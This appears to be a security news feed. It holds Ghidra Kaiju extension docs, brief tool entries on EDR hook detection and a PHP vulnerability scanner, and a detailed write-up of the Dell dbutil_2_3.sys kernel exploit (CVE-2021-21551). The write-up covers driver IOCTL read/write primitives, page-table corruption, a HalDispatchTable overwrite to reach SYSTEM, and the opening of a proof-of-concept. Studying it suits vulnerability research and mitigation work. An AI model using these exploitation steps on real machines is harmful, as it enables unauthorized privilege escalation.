If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputing the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or can not be set, you can also specify it on the command like with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to run the update command whenever you pull the latest Kaiju source code, to ensure they stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process now can auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is probably set as in previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


☑ ★ ✇ KitPloit - PenTest & Hacking Tools

HookDump - Security Product Hook Detection

By: Zion3R


EDR function hook dumping

Please refer to the Zeroperil blog post for more information https://zeroperil.co.uk/hookdump/


Building source
  • In order to build this you will need Visual Studio 2019 (community edition is fine) and CMake. The batch file Configure.bat will create two build directories with Visual Studio solutions.
  • The project may build with MinGW with the correct CMake command line, this is untested YMMV.
  • There is a dependency on zydis disassembler, so be sure to update the sub-modules in git before configuring the project.
  • There is a 32bit and 64bit project, you may find that EDR's hook different functions in 32/64 bit so building and running both executables may provide more complete results

Notes
  • Some EDRs replace the WOW stub in the TEB structure (specifically Wow32Reserved) in order to hook system calls for 32 bit binaries. In this case you may see zero hooks since no jump instructions are present in NTDLL. Most likley you will see hooks in the x64 version as the syscall instruction is used for system calls instead of a WOW stub
  • We have noted that Windows Defender does not use any user mode hooks
  • This tool is designed to be run as a standard user, elevation is not required

Hook Types Detected

JMP

A jump instruction has been patched into the function to redirect execution flow


WOW

Detection of the WOW64 syscall stub being hooked, which allows filtering of all system calls


EAT

The address in the export address table does not match the address in the export address table in the copy on disc


GPA

GetProcAddress hook, an experimental feature, this is only output in verbose mode, when the result of GetProcAddress does not match the manually resolved function address. YYMV with this and some care should be taken to verify the results.


Verification

The only way to truly verify the correct working of the program is to check in a debugger if hooks are present. If you are getting a zero hooks result and are expecting to see something different, then first verify this in a debugger and please get in touch.



☑ ★ ✇ KitPloit - PenTest & Hacking Tools

Php_Code_Analysis - San your PHP code for vulnerabilities

By: Zion3R


This script will scan your code

the script can find

  1. check_file_upload issues
  2. host_header_injection
  3. SQl injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

☑ ★ ✇ Connor McGarr

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

By: Connor McGarr

Introduction

Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can “bypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate where the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase;

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
